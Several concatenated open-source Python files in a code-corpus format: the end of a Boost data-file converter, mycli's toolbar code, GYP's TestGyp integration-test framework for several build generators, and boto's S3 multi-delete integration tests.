            while DATA_REGEX.match(line):
                cdata.append(_raw_data(line))
                i += 1
                line = lines[i]
                # Skip comments
                while CXX_COMMENT.match(line):
                    i += 1
                    line = lines[i]
            # Sanity check: row count must match the header's promise.
            if not len(cdata) == n:
                raise ValueError("parsed data: %d, expected %d" % (len(cdata), n))
            data[m.group(3)] = cdata
        else:
            i += 1
    return data
def dump_dataset(filename, data):
    """Write one dataset to *filename*, one row per line.

    Each row (a sequence of strings) is joined with single spaces.
    The original try/finally close is expressed as a context manager,
    which guarantees the file is closed even if a write fails.
    """
    with open(filename, 'w') as fid:
        for line in data:
            fid.write("%s\n" % " ".join(line))
def dump_datasets(filename):
    """Parse one .ipp file and dump each dataset it contains to a text file.

    Output files are written to DATA_DIR/<basename>_<ext>/<dataset>.txt.
    Note: os.makedirs raises OSError if the target directory already
    exists, so re-running over the same DATA_DIR fails fast.
    """
    base, ext = os.path.splitext(os.path.basename(filename))
    # Encode the original extension into the directory name, e.g. foo_ipp.
    base += '_%s' % ext[1:]
    datadir = os.path.join(DATA_DIR, base)
    os.makedirs(datadir)
    datasets = parse_ipp_file(filename)
    for k, d in datasets.items():
        print(k, len(d))
        dfilename = os.path.join(datadir, k) + '.txt'
        dump_dataset(dfilename, d)
if __name__ == '__main__':
    # Convert every known boost data file found under BOOST_SRC.
    for filename in DATA_FILES:
        filename = os.path.join(BOOST_SRC, filename)
        print("================= %s ===============" % filename)
        dump_datasets(filename)
| bsd-3-clause |
fw1121/mycli | mycli/clitoolbar.py | 27 | 1104 | from pygments.token import Token
def create_toolbar_tokens_func(get_key_bindings, token=None):
    """
    Return a function that generates the toolbar tokens.
    """
    assert callable(get_key_bindings)
    token = token or Token.Toolbar

    def get_toolbar_tokens(cli):
        buf = cli.buffers['default']
        tokens = [(token, ' ')]

        # F2: smart completion on/off.
        if buf.completer.smart_completion:
            tokens.append((token.On, '[F2] Smart Completion: ON '))
        else:
            tokens.append((token.Off, '[F2] Smart Completion: OFF '))

        # F3: multiline editing on/off.
        if buf.always_multiline:
            tokens.append((token.On, '[F3] Multiline: ON '))
        else:
            tokens.append((token.Off, '[F3] Multiline: OFF '))
        if buf.always_multiline:
            tokens.append((token,
                           ' (Semi-colon [;] will end the line)'))

        # F4: current key-binding mode.
        if get_key_bindings() == 'vi':
            tokens.append((token.On, '[F4] Vi-mode'))
        else:
            tokens.append((token.On, '[F4] Emacs-mode'))
        return tokens

    return get_toolbar_tokens
| bsd-3-clause |
nawawi/wkhtmltopdf | webkit/Source/ThirdParty/gyp/test/lib/TestGyp.py | 12 | 25341 | #!/usr/bin/python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
TestGyp.py: a testing framework for GYP integration tests.
"""
import os
import re
import shutil
import stat
import sys
import TestCommon
from TestCommon import __all__
# Export TestGyp in addition to everything re-exported from TestCommon.
__all__.extend([
  'TestGyp',
])
class TestGypBase(TestCommon.TestCommon):
  """
  Class for controlling end-to-end tests of gyp generators.

  Instantiating this class will create a temporary directory and
  arrange for its destruction (via the TestCmd superclass) and
  copy all of the non-gyptest files in the directory hierarchy of the
  executing script.

  The default behavior is to test the 'gyp' or 'gyp.bat' file in the
  current directory.  An alternative may be specified explicitly on
  instantiation, or by setting the TESTGYP_GYP environment variable.

  This class should be subclassed for each supported gyp generator
  (format).  Various abstract methods below define calling signatures
  used by the test scripts to invoke builds on the generated build
  configuration and to run executables generated by those builds.
  """

  build_tool = None
  build_tool_list = []

  # Platform-specific file prefixes/suffixes, taken from TestCommon.
  _exe = TestCommon.exe_suffix
  _obj = TestCommon.obj_suffix
  shobj_ = TestCommon.shobj_prefix
  _shobj = TestCommon.shobj_suffix
  lib_ = TestCommon.lib_prefix
  _lib = TestCommon.lib_suffix
  dll_ = TestCommon.dll_prefix
  _dll = TestCommon.dll_suffix

  # Constants to represent different targets.
  ALL = '__all__'
  DEFAULT = '__default__'

  # Constants for different target types.
  EXECUTABLE = '__executable__'
  STATIC_LIB = '__static_lib__'
  SHARED_LIB = '__shared_lib__'

  def __init__(self, gyp=None, *args, **kw):
    self.origin_cwd = os.path.abspath(os.path.dirname(sys.argv[0]))

    # Resolve the gyp executable: explicit argument, then the
    # TESTGYP_GYP environment variable, then a platform default.
    if not gyp:
      gyp = os.environ.get('TESTGYP_GYP')
      if not gyp:
        if sys.platform == 'win32':
          gyp = 'gyp.bat'
        else:
          gyp = 'gyp'
    self.gyp = os.path.abspath(gyp)

    self.initialize_build_tool()

    if not kw.has_key('match'):
      kw['match'] = TestCommon.match_exact

    if not kw.has_key('workdir'):
      # Default behavior:  the null string causes TestCmd to create
      # a temporary directory for us.
      kw['workdir'] = ''

    formats = kw.get('formats', [])
    if kw.has_key('formats'):
      del kw['formats']

    super(TestGypBase, self).__init__(*args, **kw)

    # Formats prefixed with '!' exclude that generator; bare names
    # restrict the test to only those generators.
    excluded_formats = set([f for f in formats if f[0] == '!'])
    included_formats = set(formats) - excluded_formats
    if ('!'+self.format in excluded_formats or
        included_formats and self.format not in included_formats):
      msg = 'Invalid test for %r format; skipping test.\n'
      self.skip_test(msg % self.format)

    self.copy_test_configuration(self.origin_cwd, self.workdir)
    self.set_configuration(None)

  def built_file_must_exist(self, name, type=None, **kw):
    """
    Fails the test if the specified built file name does not exist.
    """
    return self.must_exist(self.built_file_path(name, type, **kw))

  def built_file_must_not_exist(self, name, type=None, **kw):
    """
    Fails the test if the specified built file name exists.
    """
    return self.must_not_exist(self.built_file_path(name, type, **kw))

  def built_file_must_match(self, name, contents, **kw):
    """
    Fails the test if the contents of the specified built file name
    do not match the specified contents.
    """
    return self.must_match(self.built_file_path(name, **kw), contents)

  def built_file_must_not_match(self, name, contents, **kw):
    """
    Fails the test if the contents of the specified built file name
    match the specified contents.
    """
    return self.must_not_match(self.built_file_path(name, **kw), contents)

  def copy_test_configuration(self, source_dir, dest_dir):
    """
    Copies the test configuration from the specified source_dir
    (the directory in which the test script lives) to the
    specified dest_dir (a temporary working directory).

    This ignores all files and directories that begin with
    the string 'gyptest', and all '.svn' subdirectories.
    """
    for root, dirs, files in os.walk(source_dir):
      if '.svn' in dirs:
        # Pruning 'dirs' in place stops os.walk from descending into it.
        dirs.remove('.svn')
      dirs = [ d for d in dirs if not d.startswith('gyptest') ]
      files = [ f for f in files if not f.startswith('gyptest') ]
      for dirname in dirs:
        source = os.path.join(root, dirname)
        destination = source.replace(source_dir, dest_dir)
        os.mkdir(destination)
        if sys.platform != 'win32':
          shutil.copystat(source, destination)
      for filename in files:
        source = os.path.join(root, filename)
        destination = source.replace(source_dir, dest_dir)
        shutil.copy2(source, destination)

  def initialize_build_tool(self):
    """
    Initializes the .build_tool attribute.

    Searches the .build_tool_list for an executable name on the user's
    $PATH.  The first tool on the list is used as-is if nothing is found
    on the current $PATH.
    """
    for build_tool in self.build_tool_list:
      if not build_tool:
        continue
      if os.path.isabs(build_tool):
        self.build_tool = build_tool
        return
      build_tool = self.where_is(build_tool)
      if build_tool:
        self.build_tool = build_tool
        return

    # Nothing found on $PATH: fall back to the first (relative) name.
    if self.build_tool_list:
      self.build_tool = self.build_tool_list[0]

  def relocate(self, source, destination):
    """
    Renames (relocates) the specified source (usually a directory)
    to the specified destination, creating the destination directory
    first if necessary.

    Note:  Don't use this as a generic "rename" operation.  In the
    future, "relocating" parts of a GYP tree may affect the state of
    the test to modify the behavior of later method calls.
    """
    destination_dir = os.path.dirname(destination)
    if not os.path.exists(destination_dir):
      self.subdir(destination_dir)
    os.rename(source, destination)

  def report_not_up_to_date(self):
    """
    Reports that a build is not up-to-date.

    This provides common reporting for formats that have complicated
    conditions for checking whether a build is up-to-date.  Formats
    that expect exact output from the command (make, scons) can
    just set stdout= when they call the run_build() method.
    """
    print "Build is not up-to-date:"
    print self.banner('STDOUT ')
    print self.stdout()
    stderr = self.stderr()
    if stderr:
      print self.banner('STDERR ')
      print stderr

  def run_gyp(self, gyp_file, *args, **kw):
    """
    Runs gyp against the specified gyp_file with the specified args.
    """
    # TODO:  --depth=. works around Chromium-specific tree climbing.
    args = ('--depth=.', '--format='+self.format, gyp_file) + args
    return self.run(program=self.gyp, arguments=args, **kw)

  def run(self, *args, **kw):
    """
    Executes a program by calling the superclass .run() method.

    This exists to provide a common place to filter out keyword
    arguments implemented in this layer, without having to update
    the tool-specific subclasses or clutter the tests themselves
    with platform-specific code.
    """
    # SYMROOT is only meaningful to the Xcode subclass; strip it here
    # so other generators' run() calls don't choke on it.
    if kw.has_key('SYMROOT'):
      del kw['SYMROOT']
    super(TestGypBase, self).run(*args, **kw)

  def set_configuration(self, configuration):
    """
    Sets the configuration, to be used for invoking the build
    tool and testing potential built output.
    """
    self.configuration = configuration

  def configuration_dirname(self):
    # Directory component of the configuration, e.g. 'Debug' from
    # a 'Debug|Win32' configuration string.
    if self.configuration:
      return self.configuration.split('|')[0]
    else:
      return 'Default'

  def configuration_buildname(self):
    # Full configuration name, exactly as passed to the build tool.
    if self.configuration:
      return self.configuration
    else:
      return 'Default'

  #
  # Abstract methods to be defined by format-specific subclasses.
  #

  def build(self, gyp_file, target=None, **kw):
    """
    Runs a build of the specified target against the configuration
    generated from the specified gyp_file.

    A 'target' argument of None or the special value TestGyp.DEFAULT
    specifies the default argument for the underlying build tool.
    A 'target' argument of TestGyp.ALL specifies the 'all' target
    (if any) of the underlying build tool.
    """
    raise NotImplementedError

  def built_file_path(self, name, type=None, **kw):
    """
    Returns a path to the specified file name, of the specified type.
    """
    raise NotImplementedError

  def built_file_basename(self, name, type=None, **kw):
    """
    Returns the base name of the specified file name, of the specified type.

    A bare=True keyword argument specifies that prefixes and suffixes shouldn't
    be applied.
    """
    if not kw.get('bare'):
      if type == self.EXECUTABLE:
        name = name + self._exe
      elif type == self.STATIC_LIB:
        name = self.lib_ + name + self._lib
      elif type == self.SHARED_LIB:
        name = self.dll_ + name + self._dll
    return name

  def run_built_executable(self, name, *args, **kw):
    """
    Runs an executable program built from a gyp-generated configuration.

    The specified name should be independent of any particular generator.
    Subclasses should find the output executable in the appropriate
    output build directory, tack on any necessary executable suffix, etc.
    """
    raise NotImplementedError

  def up_to_date(self, gyp_file, target=None, **kw):
    """
    Verifies that a build of the specified target is up to date.

    The subclass should implement this by calling build()
    (or a reasonable equivalent), checking whatever conditions
    will tell it the build was an "up to date" null build, and
    failing if it isn't.
    """
    raise NotImplementedError
class TestGypGypd(TestGypBase):
  """
  Subclass for testing the GYP 'gypd' generator (spit out the
  internal data structure as pretty-printed Python).
  """
  # No build tool: 'gypd' only emits the data structure, nothing to build.
  format = 'gypd'
class TestGypMake(TestGypBase):
  """
  Subclass for testing the GYP Make generator.
  """
  format = 'make'
  build_tool_list = ['make']
  ALL = 'all'

  def build(self, gyp_file, target=None, **kw):
    """
    Runs a Make build using the Makefiles generated from the specified
    gyp_file.
    """
    arguments = kw.get('arguments', [])[:]
    if self.configuration:
      arguments.append('BUILDTYPE=' + self.configuration)
    if target not in (None, self.DEFAULT):
      arguments.append(target)
    # Sub-directory builds provide per-gyp Makefiles (i.e.
    # Makefile.gyp_filename), so use that if there is no Makefile.
    chdir = kw.get('chdir', '')
    if not os.path.exists(os.path.join(chdir, 'Makefile')):
      print "NO Makefile in " + os.path.join(chdir, 'Makefile')
      arguments.insert(0, '-f')
      arguments.insert(1, os.path.splitext(gyp_file)[0] + '.Makefile')
    kw['arguments'] = arguments
    return self.run(program=self.build_tool, **kw)

  def up_to_date(self, gyp_file, target=None, **kw):
    """
    Verifies that a build of the specified Make target is up to date.
    """
    if target in (None, self.DEFAULT):
      message_target = 'all'
    else:
      message_target = target
    # Make prints exactly this message for a null build; match it verbatim.
    kw['stdout'] = "make: Nothing to be done for `%s'.\n" % message_target
    return self.build(gyp_file, target, **kw)

  def run_built_executable(self, name, *args, **kw):
    """
    Runs an executable built by Make.
    """
    configuration = self.configuration_dirname()
    libdir = os.path.join('out', configuration, 'lib')
    # TODO(piman): when everything is cross-compile safe, remove lib.target
    os.environ['LD_LIBRARY_PATH'] = libdir + '.host:' + libdir + '.target'
    # Enclosing the name in a list avoids prepending the original dir.
    program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
    return self.run(program=program, *args, **kw)

  def built_file_path(self, name, type=None, **kw):
    """
    Returns a path to the specified file name, of the specified type,
    as built by Make.

    Built files are in the subdirectory 'out/{configuration}'.
    The default is 'out/Default'.

    A chdir= keyword argument specifies the source directory
    relative to which the output subdirectory can be found.

    "type" values of STATIC_LIB or SHARED_LIB append the necessary
    prefixes and suffixes to a platform-independent library base name.

    A libdir= keyword argument specifies a library subdirectory other
    than the default 'obj.target'.
    """
    result = []
    chdir = kw.get('chdir')
    if chdir:
      result.append(chdir)
    configuration = self.configuration_dirname()
    result.extend(['out', configuration])
    if type == self.STATIC_LIB:
      result.append(kw.get('libdir', 'obj.target'))
    elif type == self.SHARED_LIB:
      result.append(kw.get('libdir', 'lib.target'))
    result.append(self.built_file_basename(name, type, **kw))
    return self.workpath(*result)
class TestGypMSVS(TestGypBase):
  """
  Subclass for testing the GYP Visual Studio generator.
  """
  format = 'msvs'

  # Matches devenv's build summary line; group(1) = succeeded count,
  # group(2) = up-to-date count.
  u = r'=== Build: (\d+) succeeded, 0 failed, (\d+) up-to-date, 0 skipped ==='
  up_to_date_re = re.compile(u, re.M)

  # Initial None element will indicate to our .initialize_build_tool()
  # method below that 'devenv' was not found on %PATH%.
  #
  # Note:  we must use devenv.com to be able to capture build output.
  # Directly executing devenv.exe only sends output to BuildLog.htm.
  build_tool_list = [None, 'devenv.com']

  def initialize_build_tool(self):
    """ Initializes the Visual Studio .build_tool and .uses_msbuild parameters.

    We use the value specified by GYP_MSVS_VERSION.  If not specified, we
    search %PATH% and %PATHEXT% for a devenv.{exe,bat,...} executable.
    Failing that, we search for likely deployment paths.
    """
    super(TestGypMSVS, self).initialize_build_tool()
    possible_roots = ['C:\\Program Files (x86)', 'C:\\Program Files']
    possible_paths = {
        '2010': r'Microsoft Visual Studio 10.0\Common7\IDE\devenv.com',
        '2008': r'Microsoft Visual Studio 9.0\Common7\IDE\devenv.com',
        '2005': r'Microsoft Visual Studio 8\Common7\IDE\devenv.com'}
    msvs_version = os.environ.get('GYP_MSVS_VERSION', 'auto')
    if msvs_version in possible_paths:
      # Check that the path to the specified GYP_MSVS_VERSION exists.
      path = possible_paths[msvs_version]
      for r in possible_roots:
        bt = os.path.join(r, path)
        if os.path.exists(bt):
          self.build_tool = bt
          self.uses_msbuild = msvs_version >= '2010'
          return
      else:
        # for-else: no install found under any root for the requested version.
        print ('Warning: Environment variable GYP_MSVS_VERSION specifies "%s" '
               'but corresponding "%s" was not found.' % (msvs_version, path))
    if self.build_tool:
      # We found 'devenv' on the path, use that and try to guess the version.
      for version, path in possible_paths.iteritems():
        if self.build_tool.find(path) >= 0:
          self.uses_msbuild = version >= '2010'
          return
      else:
        # If not, assume not MSBuild.
        self.uses_msbuild = False
      return
    # Neither GYP_MSVS_VERSION nor the path help us out.  Iterate through
    # the choices looking for a match.
    for version, path in possible_paths.iteritems():
      for r in possible_roots:
        bt = os.path.join(r, path)
        if os.path.exists(bt):
          self.build_tool = bt
          self.uses_msbuild = msvs_version >= '2010'
          return
    print 'Error: could not find devenv'
    sys.exit(1)

  def build(self, gyp_file, target=None, rebuild=False, **kw):
    """
    Runs a Visual Studio build using the configuration generated
    from the specified gyp_file.
    """
    configuration = self.configuration_buildname()
    if rebuild:
      build = '/Rebuild'
    else:
      build = '/Build'
    arguments = kw.get('arguments', [])[:]
    arguments.extend([gyp_file.replace('.gyp', '.sln'),
                      build, configuration])
    # Note:  the Visual Studio generator doesn't add an explicit 'all'
    # target, so we just treat it the same as the default.
    if target not in (None, self.ALL, self.DEFAULT):
      arguments.extend(['/Project', target])
    if self.configuration:
      arguments.extend(['/ProjectConfig', self.configuration])
    kw['arguments'] = arguments
    return self.run(program=self.build_tool, **kw)

  def up_to_date(self, gyp_file, target=None, **kw):
    """
    Verifies that a build of the specified Visual Studio target is up to date.
    """
    result = self.build(gyp_file, target, **kw)
    if not result:
      stdout = self.stdout()

      m = self.up_to_date_re.search(stdout)
      up_to_date = False
      if m:
        succeeded = m.group(1)
        up_to_date = m.group(2)
        up_to_date = succeeded == '0' and up_to_date == '1'
        # Figuring out if the build is up to date changed with VS2010.
        # For builds that should be up to date, I sometimes get
        # "1 succeeded and 0 up to date". As an ad-hoc measure, we check
        # this and also verify that th number of output lines is small.
        # I don't know if this is caused by VS itself or is due to
        # interaction with virus checkers.
        # NOTE(review): up_to_date was rebound to a bool two lines above,
        # so the string comparison up_to_date == '0' below can never be
        # true -- likely m.group(2) was intended; confirm before relying
        # on this branch.
        if self.uses_msbuild and (succeeded == '1' and
                                  up_to_date == '0' and
                                  stdout.count('\n') <= 6):
          up_to_date = True
      if not up_to_date:
        self.report_not_up_to_date()
        self.fail_test()
    return result

  def run_built_executable(self, name, *args, **kw):
    """
    Runs an executable built by Visual Studio.
    """
    configuration = self.configuration_dirname()
    # Enclosing the name in a list avoids prepending the original dir.
    program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
    return self.run(program=program, *args, **kw)

  def built_file_path(self, name, type=None, **kw):
    """
    Returns a path to the specified file name, of the specified type,
    as built by Visual Studio.

    Built files are in a subdirectory that matches the configuration
    name.  The default is 'Default'.

    A chdir= keyword argument specifies the source directory
    relative to which the output subdirectory can be found.

    "type" values of STATIC_LIB or SHARED_LIB append the necessary
    prefixes and suffixes to a platform-independent library base name.
    """
    result = []
    chdir = kw.get('chdir')
    if chdir:
      result.append(chdir)
    result.append(self.configuration_dirname())
    if type == self.STATIC_LIB:
      result.append('lib')
    result.append(self.built_file_basename(name, type, **kw))
    return self.workpath(*result)
class TestGypSCons(TestGypBase):
  """
  Subclass for testing the GYP SCons generator.
  """
  format = 'scons'
  build_tool_list = ['scons', 'scons.py']
  ALL = 'all'

  def build(self, gyp_file, target=None, **kw):
    """
    Runs a scons build using the SCons configuration generated from the
    specified gyp_file.
    """
    arguments = kw.get('arguments', [])[:]
    dirname = os.path.dirname(gyp_file)
    if dirname:
      # Run scons from the directory containing the generated SConstruct.
      arguments.extend(['-C', dirname])
    if self.configuration:
      arguments.append('--mode=' + self.configuration)
    if target not in (None, self.DEFAULT):
      arguments.append(target)
    kw['arguments'] = arguments
    return self.run(program=self.build_tool, **kw)

  def up_to_date(self, gyp_file, target=None, **kw):
    """
    Verifies that a build of the specified SCons target is up to date.
    """
    if target in (None, self.DEFAULT):
      up_to_date_targets = 'all'
    else:
      up_to_date_targets = target
    # SCons prints one "is up to date" line per requested target.
    up_to_date_lines = []
    for arg in up_to_date_targets.split():
      up_to_date_lines.append("scons: `%s' is up to date.\n" % arg)
    kw['stdout'] = ''.join(up_to_date_lines)
    arguments = kw.get('arguments', [])[:]
    arguments.append('-Q')  # suppress SCons progress messages
    kw['arguments'] = arguments
    return self.build(gyp_file, target, **kw)

  def run_built_executable(self, name, *args, **kw):
    """
    Runs an executable built by scons.
    """
    configuration = self.configuration_dirname()
    os.environ['LD_LIBRARY_PATH'] = os.path.join(configuration, 'lib')
    # Enclosing the name in a list avoids prepending the original dir.
    program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
    return self.run(program=program, *args, **kw)

  def built_file_path(self, name, type=None, **kw):
    """
    Returns a path to the specified file name, of the specified type,
    as built by Scons.

    Built files are in a subdirectory that matches the configuration
    name.  The default is 'Default'.

    A chdir= keyword argument specifies the source directory
    relative to which the output subdirectory can be found.

    "type" values of STATIC_LIB or SHARED_LIB append the necessary
    prefixes and suffixes to a platform-independent library base name.
    """
    result = []
    chdir = kw.get('chdir')
    if chdir:
      result.append(chdir)
    result.append(self.configuration_dirname())
    if type in (self.STATIC_LIB, self.SHARED_LIB):
      result.append('lib')
    result.append(self.built_file_basename(name, type, **kw))
    return self.workpath(*result)
class TestGypXcode(TestGypBase):
  """
  Subclass for testing the GYP Xcode generator.
  """
  format = 'xcode'
  build_tool_list = ['xcodebuild']

  # Script-phase output that can appear even in an up-to-date build;
  # it must be stripped from stdout before the up-to-date comparison.
  phase_script_execution = ("\n"
                            "PhaseScriptExecution /\\S+/Script-[0-9A-F]+\\.sh\n"
                            "    cd /\\S+\n"
                            "    /bin/sh -c /\\S+/Script-[0-9A-F]+\\.sh\n"
                            "(make: Nothing to be done for `all'\\.\n)?")

  strip_up_to_date_expressions = [
    # Various actions or rules can run even when the overall build target
    # is up to date.  Strip those phases' GYP-generated output.
    re.compile(phase_script_execution, re.S),

    # The message from distcc_pump can trail the "BUILD SUCCEEDED"
    # message, so strip that, too.
    re.compile('__________Shutting down distcc-pump include server\n', re.S),
  ]

  # Known tails of an up-to-date xcodebuild run, by Xcode version.
  up_to_date_endings = (
    'Checking Dependencies...\n** BUILD SUCCEEDED **\n',  # Xcode 3.0/3.1
    'Check dependencies\n** BUILD SUCCEEDED **\n\n',      # Xcode 3.2
  )

  def build(self, gyp_file, target=None, **kw):
    """
    Runs an xcodebuild using the .xcodeproj generated from the specified
    gyp_file.
    """
    # Be sure we're working with a copy of 'arguments' since we modify it.
    # The caller may not be expecting it to be modified.
    arguments = kw.get('arguments', [])[:]
    arguments.extend(['-project', gyp_file.replace('.gyp', '.xcodeproj')])
    if target == self.ALL:
      arguments.append('-alltargets',)
    elif target not in (None, self.DEFAULT):
      arguments.extend(['-target', target])
    if self.configuration:
      arguments.extend(['-configuration', self.configuration])
    symroot = kw.get('SYMROOT', '$SRCROOT/build')
    if symroot:
      arguments.append('SYMROOT='+symroot)
    kw['arguments'] = arguments
    return self.run(program=self.build_tool, **kw)

  def up_to_date(self, gyp_file, target=None, **kw):
    """
    Verifies that a build of the specified Xcode target is up to date.
    """
    result = self.build(gyp_file, target, **kw)
    if not result:
      output = self.stdout()
      # Remove output that can legitimately appear in a null build.
      for expression in self.strip_up_to_date_expressions:
        output = expression.sub('', output)
      if not output.endswith(self.up_to_date_endings):
        self.report_not_up_to_date()
        self.fail_test()
    return result

  def run_built_executable(self, name, *args, **kw):
    """
    Runs an executable built by xcodebuild.
    """
    configuration = self.configuration_dirname()
    os.environ['DYLD_LIBRARY_PATH'] = os.path.join('build', configuration)
    # Enclosing the name in a list avoids prepending the original dir.
    program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
    return self.run(program=program, *args, **kw)

  def built_file_path(self, name, type=None, **kw):
    """
    Returns a path to the specified file name, of the specified type,
    as built by Xcode.

    Built files are in the subdirectory 'build/{configuration}'.
    The default is 'build/Default'.

    A chdir= keyword argument specifies the source directory
    relative to which the output subdirectory can be found.

    "type" values of STATIC_LIB or SHARED_LIB append the necessary
    prefixes and suffixes to a platform-independent library base name.
    """
    result = []
    chdir = kw.get('chdir')
    if chdir:
      result.append(chdir)
    configuration = self.configuration_dirname()
    result.extend(['build', configuration])
    result.append(self.built_file_basename(name, type, **kw))
    return self.workpath(*result)
# All generator-specific TestGyp subclasses; the TestGyp() factory below
# selects one by matching its .format attribute.
format_class_list = [
  TestGypGypd,
  TestGypMake,
  TestGypMSVS,
  TestGypSCons,
  TestGypXcode,
]
def TestGyp(*args, **kw):
  """
  Returns an appropriate TestGyp* instance for a specified GYP format.

  The format is taken from the 'format' keyword argument if present
  (and is removed from kw before the constructor call), otherwise from
  the TESTGYP_FORMAT environment variable.

  Raises an Exception if no TestGyp* subclass matches the format.
  """
  format = kw.pop('format', None)
  if not format:
    format = os.environ.get('TESTGYP_FORMAT')
  for format_class in format_class_list:
    if format == format_class.format:
      return format_class(*args, **kw)
  # Parenthesized raise form works under both Python 2 and 3; the old
  # 'raise Exception, msg' statement is a syntax error on Python 3.
  raise Exception("unknown format %r" % format)
| lgpl-3.0 |
KaranToor/MA450 | google-cloud-sdk/.install/.backup/platform/gsutil/third_party/boto/tests/integration/s3/test_multidelete.py | 25 | 6770 | # -*- coding: utf-8 -*-
# Copyright (c) 2011 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for the S3 MultiDelete
"""
import unittest
import time
from boto.s3.key import Key
from boto.s3.deletemarker import DeleteMarker
from boto.s3.prefix import Prefix
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
class S3MultiDeleteTest(unittest.TestCase):
    """Integration tests for Bucket.delete_keys (S3 multi-object delete).

    These tests talk to live S3: every test method creates real objects
    in the per-run bucket created by setUp.
    """
    s3 = True  # marker attribute used by the test runner to select S3 tests

    def setUp(self):
        # Each run gets its own uniquely (timestamp-) named bucket.
        self.conn = S3Connection()
        self.bucket_name = 'multidelete-%d' % int(time.time())
        self.bucket = self.conn.create_bucket(self.bucket_name)

    def tearDown(self):
        for key in self.bucket:
            key.delete()
        # Also remove any versions/delete markers before deleting the bucket.
        self.bucket.delete_keys(self.bucket.list_versions())
        self.bucket.delete()

    def test_delete_nothing(self):
        result = self.bucket.delete_keys([])
        self.assertEqual(len(result.deleted), 0)
        self.assertEqual(len(result.errors), 0)

    def test_delete_illegal(self):
        # A plain dict is not an accepted key specification.
        result = self.bucket.delete_keys([{"dict":"notallowed"}])
        self.assertEqual(len(result.deleted), 0)
        self.assertEqual(len(result.errors), 1)

    def test_delete_mix(self):
        # Strings, (name, version) tuples, Key and DeleteMarker objects are
        # accepted; a bare Key(), a Prefix and a dict are rejected as errors.
        result = self.bucket.delete_keys(["king",
                                          ("mice", None),
                                          Key(name="regular"),
                                          Key(),
                                          Prefix(name="folder/"),
                                          DeleteMarker(name="deleted"),
                                          {"bad":"type"}])
        self.assertEqual(len(result.deleted), 4)
        self.assertEqual(len(result.errors), 3)

    def test_delete_quietly(self):
        # quiet=True suppresses per-key success entries in the response.
        result = self.bucket.delete_keys(["king"], quiet=True)
        self.assertEqual(len(result.deleted), 0)
        self.assertEqual(len(result.errors), 0)

    def test_delete_must_escape(self):
        # Key name contains XML-special characters that must be escaped
        # in the multi-delete request body.
        result = self.bucket.delete_keys([Key(name=">_<;")])
        self.assertEqual(len(result.deleted), 1)
        self.assertEqual(len(result.errors), 0)

    def test_delete_unknown_version(self):
        no_ver = Key(name="no")
        no_ver.version_id = "version"
        result = self.bucket.delete_keys([no_ver])
        self.assertEqual(len(result.deleted), 0)
        self.assertEqual(len(result.errors), 1)

    def test_delete_kanji(self):
        # Non-ASCII key names must round-trip through the request.
        result = self.bucket.delete_keys([u"漢字", Key(name=u"日本語")])
        self.assertEqual(len(result.deleted), 2)
        self.assertEqual(len(result.errors), 0)

    def test_delete_empty_by_list(self):
        result = self.bucket.delete_keys(self.bucket.list())
        self.assertEqual(len(result.deleted), 0)
        self.assertEqual(len(result.errors), 0)

    def test_delete_kanji_by_list(self):
        for key_name in [u"漢字", u"日本語", u"テスト"]:
            key = self.bucket.new_key(key_name)
            key.set_contents_from_string('this is a test')
        result = self.bucket.delete_keys(self.bucket.list())
        self.assertEqual(len(result.deleted), 3)
        self.assertEqual(len(result.errors), 0)

    def test_delete_with_prefixes(self):
        for key_name in ["a", "a/b", "b"]:
            key = self.bucket.new_key(key_name)
            key.set_contents_from_string('this is a test')

        # First delete all "files": "a" and "b"
        result = self.bucket.delete_keys(self.bucket.list(delimiter="/"))
        self.assertEqual(len(result.deleted), 2)
        # Using delimiter will cause 1 common prefix to be listed
        # which will be skipped as an error.
        self.assertEqual(len(result.errors), 1)
        self.assertEqual(result.errors[0].key, "a/")

        # Next delete any remaining objects: "a/b"
        result = self.bucket.delete_keys(self.bucket.list())
        self.assertEqual(len(result.deleted), 1)
        self.assertEqual(len(result.errors), 0)
        self.assertEqual(result.deleted[0].key, "a/b")

    def test_delete_too_many_versions(self):
        # configure versioning first
        self.bucket.configure_versioning(True)

        # Add 1000 initial versions as DMs by deleting them :-)
        # Adding 1000 objects is painful otherwise...
        key_names = ['key-%03d' % i for i in range(0, 1000)]
        result = self.bucket.delete_keys(key_names)
        self.assertEqual(len(result.deleted) + len(result.errors), 1000)

        # delete them again to create 1000 more delete markers
        result = self.bucket.delete_keys(key_names)
        self.assertEqual(len(result.deleted) + len(result.errors), 1000)

        # Sometimes takes AWS sometime to settle
        time.sleep(10)

        # delete all versions to delete 2000 objects.
        # this tests the 1000 limit.
        result = self.bucket.delete_keys(self.bucket.list_versions())
        self.assertEqual(len(result.deleted) + len(result.errors), 2000)

    def test_1(self):
        nkeys = 100

        # create a bunch of keynames
        key_names = ['key-%03d' % i for i in range(0, nkeys)]

        # create the corresponding keys
        for key_name in key_names:
            key = self.bucket.new_key(key_name)
            key.set_contents_from_string('this is a test')

        # now count keys in bucket
        n = 0
        for key in self.bucket:
            n += 1
        self.assertEqual(n, nkeys)

        # now delete them all
        result = self.bucket.delete_keys(key_names)
        self.assertEqual(len(result.deleted), nkeys)
        self.assertEqual(len(result.errors), 0)

        time.sleep(5)

